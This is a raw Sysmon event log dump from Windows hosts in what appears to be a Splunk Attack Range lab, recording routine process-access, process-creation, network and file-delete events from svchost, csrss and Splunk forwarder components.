08:03:25.053{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809561Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:25.053{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809560Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:25.053{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809559Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:25.053{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809558Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:25.053{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809557Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:25.053{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F74D-60EB-C179-00000000D001}2460C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809556Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:25.053{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F74D-60EB-C179-00000000D001}2460C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809555Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:25.038{0C1E0330-F74D-60EB-C179-00000000D001}2460C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001053071Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:17.615{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61901-false10.0.1.12-8000- 23542300x80000000000000001053070Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:26.336{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE6F3E9B2EB23980FFFF9D1733316BFD,SHA256=06081532C247C8A750252E7B390F0E3EC2C2C71EF343E5FA90179D7F07AE92AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809598Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:26.740{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D45A80A6917A45AAEEBFDE90DAC48B6D,SHA256=52FF31AB076F420C1CAE65BB1CAD9EED00109EF4840FBC14F2663868B9E21254,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809597Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:26.412{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F74E-60EB-C379-00000000D001}3884C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809596Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:26.412{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809595Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:26.412{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809594Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:26.412{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809593Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:26.412{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809592Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:26.412{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809591Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:26.412{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809590Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:26.412{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809589Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:26.396{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809588Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:26.396{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809587Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:26.396{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F74E-60EB-C379-00000000D001}3884C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809586Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:26.396{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F74E-60EB-C379-00000000D001}3884C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809585Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:26.397{0C1E0330-F74E-60EB-C379-00000000D001}3884C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000809628Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:27.928{0C1E0330-F74F-60EB-C579-00000000D001}5043456C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809627Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:27.787{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F74F-60EB-C579-00000000D001}504C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809626Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:27.787{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809625Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:27.787{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809624Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 